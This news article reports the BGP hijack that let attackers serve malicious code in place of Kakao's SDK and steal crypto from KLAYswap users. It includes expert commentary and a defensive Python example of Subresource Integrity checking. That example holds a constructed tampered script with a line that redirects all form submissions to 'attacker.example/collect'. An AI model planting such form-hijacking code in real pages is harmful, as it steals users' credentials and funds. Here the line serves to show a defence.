Crypto Exchange KLAYswap Loses $1.9M After BGP Hijack
Hackers Performed Border Gateway Protocol Hack to Conduct Illegal Transactions
Unknown hackers have stolen around $1.9 million from South Korean cryptocurrency platform KLAYswap by hijacking Border Gateway Protocol routes to the server infrastructure of one of its suppliers.
BGP is the routing protocol that lets the autonomous systems making up the internet exchange reachability information. As networks interconnect, they need a way to tell each other which address ranges they can reach. This is accomplished through peering, which BGP makes possible. Without it, networks would not be able to send and receive traffic with each other, Fortinet researchers say.
The attack on KLAYswap was a BGP hijack: the attackers manipulated the routing so that users connected to KLAYswap downloaded malicious code from a server controlled by the attacker rather than the legitimate Software Development Kit file from Kakao, the company behind KakaoTalk, a popular South Korean instant messaging, marketing and customer service application used by the cryptocurrency exchange platform.
Dr. Xinxin Fan, IoTeX co-founder and head of blockchain, described how these dedicated, crafted attacks leverage the BGP hijack to inject malicious code into a user's browser and then steal the victim's funds. Fan, a cryptographer and a cybersecurity expert who has worked for Facebook and Google, tells Information Security Media Group: "Such an attack highlights that security is a multilayer issue and cryptocurrency platforms should apply the defense-in-depth approach to protect their customers' assets."
This is the fourth cryptocurrency attack over the past month. The most recent was last week's hit on Meter, a blockchain infrastructure company that provides multichain bridging and allows users to trade multiple cryptocurrencies across Ethereum and other public chains, which was exploited for around $4.4 million. That was preceded by the Wormhole network attack on a token bridge that allows users to trade multiple cryptocurrencies across the Ethereum and Solana blockchains, which was exploited for 120,000 ETH tokens valued at $321 million, and an earlier attack on Qubit Finance, which runs on the Binance Smart Chain and was hacked for more than $80 million.
KLAYswap is an instant swap protocol that operates with an on-chain liquidity pool, in which liquidity is guaranteed by automated market-making mechanisms. An on-chain swap service allows any KLAY or KCT-type-token cryptocurrency user to become a liquidity provider and earn income from transaction fee commissions.
A spokesperson for KLAYswap did not immediately respond to ISMG's request for comment.
Roger Grimes, data-driven defense evangelist at KnowBe4, says that if a BGP exploit can be used to intercept critical data, it means the upper-layer protocols and applications are not configured correctly, and he suggests BGP attacks are not hard to defeat.
Grimes says that if integrity checks and encryption are implemented at the upper layers, originating at the involved endpoints, a BGP intercept will at most cause a temporary service interruption and will not be able to eavesdrop on the involved data.
"It is a failure at the upper layers and the people who manage them that allows these types of attacks to happen. The owners of the BGP routers didn't implement any of the recommended offsets and the owners and managers of the upper-layer protocols and services also didn't implement recommended mitigations. It's a failure at both lower and upper levels," Grimes says.
"Based on the old version of KLAYswap (around January 4), the attacker changed all transaction requests of users to either directly send or approve the user's token to their contract and load it on the KLAYswap site. By changing the Kakao SDK script, the malicious code was created in the form of interfering with the operation of the existing KLAYswap code and allowing its own code to be executed," the developers say. "If a transaction occurred with corrupted logic, the user's assets were approved for use or the assets were transferred directly to the attacker's address."
KLAYswap developers say they blocked all functions of KLAYswap and performed an emergency check to prevent further damage once the incident was identified. Operation of the Klaytn minter, a component of the Orbit Bridge on the Klaytn blockchain platform, was restricted to prevent the stolen assets from being moved to other exchanges through the Orbit Bridge.
The developers say they removed the infected Kakao SDK file and identified both the wallet address and the list of assets exposed to the smart contract used by the hacker.
South Korean cybersecurity firm S2W analyzed the attack and found that the malicious code was served only to users who arrived via KLAYswap: the attacker's server checked the Referer value in the HTTP request header and returned a server-side error to everyone else. That is how the S2W researchers determined that access to services other than the one using the SDK had also been disrupted.
"Due to this attack, if a KLAYswap user requested asset deposit, swap, withdrawal, etc. from 11:30 to 1:30 on 3 February, coins were immediately transferred to the hacker's wallet specified in the malicious code, and the blockchain transactions were analyzed. As a result, the stolen coins were worth about 2.2 billion won ($1.9 million), but it was confirmed that the attacker finally stole coins worth about 1 billion won ($835,000)," S2W researchers say.
The researchers say the poisoned BGP routes announced by the attacker at the time originated from AS9457, which is operated by the South Korean carrier Dreamline, and that these manipulated routes were what the attacker used to redirect traffic during the attack.
The researchers say the Kakao SDK file is downloaded over HTTPS, so even after a successful BGP hijack the attacker's server would present a certificate that does not match the domain and the browser would not accept the response. To get around this, the attackers obtained and installed a certificate for the developers[.]kakao.com domain through ZeroSSL, an overseas certificate authority that issues certificates free of charge for three months.
"This arbitrary certificate registration is possible because the routing policy is already corrupted due to BGP Hijacking," the researchers say.
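The upper-layer integrity check Grimes refers to has a concrete form for a third-party script like the Kakao SDK: Subresource Integrity (SRI), where the page pins a hash of the script it reviewed and the browser refuses to execute a fetched body whose hash differs, regardless of how the bytes arrived or what certificate the server presented. The following is an added example written for this article, not KLAYswap's or Kakao's code. The SDK bodies are constructed stand-ins, the SDK path on developers.kakao.com is assumed, and the real file's hash is not reproduced here.

```python
"""Subresource Integrity (SRI) for a pinned third-party script.

Added example, not KLAYswap or Kakao code. GOOD_SDK and TAMPERED_SDK are
constructed sample bodies; the SDK URL path is an assumption.
"""
import base64
import hashlib
import re

# Constructed sample: the script body the page operator reviewed and pinned.
GOOD_SDK = b"window.Kakao = {init: function (key) { /* legitimate SDK */ }};\n"

# Constructed sample: the same script with injected code, as a server that
# has hijacked the route to the SDK host could serve. The URL and a
# mis-issued TLS certificate would both look fine to the browser; only the
# body differs, which is exactly what SRI detects.
TAMPERED_SDK = GOOD_SDK + (
    b"document.querySelectorAll('form').forEach(f => "
    b"f.action = 'https://attacker.example/collect');\n"
)

# Assumed path on the real host; the page only names the domain.
SDK_URL = "https://developers.kakao.com/sdk/js/kakao.js"


def sri_hash(body: bytes, alg: str = "sha384") -> str:
    """Return an SRI integrity token such as 'sha384-<base64 digest>'."""
    if alg not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(alg, body).digest()
    return f"{alg}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes) -> str:
    """Build the <script> tag the page operator ships, pinned to `body`.

    crossorigin="anonymous" is required for SRI on cross-origin scripts,
    otherwise the browser cannot compare the opaque response's bytes.
    """
    return (
        f'<script src="{src}" integrity="{sri_hash(body)}" '
        f'crossorigin="anonymous"></script>'
    )


def verify_sri(body: bytes, integrity: str) -> bool:
    """Mirror the browser's decision: accept the fetched body only if it
    matches at least one well-formed token in the (space separated)
    integrity attribute. Unknown algorithms are ignored, as browsers do."""
    for token in integrity.split():
        m = re.fullmatch(r"(sha256|sha384|sha512)-([A-Za-z0-9+/=]+)", token)
        if not m:
            continue
        alg, expected = m.groups()
        actual = base64.b64encode(hashlib.new(alg, body).digest()).decode("ascii")
        if actual == expected:
            return True
    return False


if __name__ == "__main__":
    pinned = sri_hash(GOOD_SDK)
    print(script_tag(SDK_URL, GOOD_SDK))
    print("genuine SDK executes:", verify_sri(GOOD_SDK, pinned))
    print("tampered SDK executes:", verify_sri(TAMPERED_SDK, pinned))
```

The trade-off is that SRI pins one exact revision of the script, so it only fits vendors that publish versioned, immutable SDK URLs; a mutable URL that the vendor updates in place would break the page on every legitimate release. It also does nothing for first-party pages served from a hijacked prefix, which is where route origin validation and certificate issuance controls such as CAA records and certificate transparency monitoring, rather than the page itself, have to do the work.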
'An Entrenched Protocol'
Grimes says it is unfortunate that more service implementers aren't paying attention and doing something about such attacks, since they have known about BGP hijack attacks for decades and mitigations for them exist.
"It points to the difficulty of fixing an entrenched protocol used by a lot of people. Perhaps the real question is how to better motivate people - the human layer - to care enough to do something about it? Although we should keep in mind that 90% or more of online attacks occur because of social engineering and unpatched software, BGP attacks account for less than 1% of 1% of 1%. Where should our first and best focus be?" Grimes asks.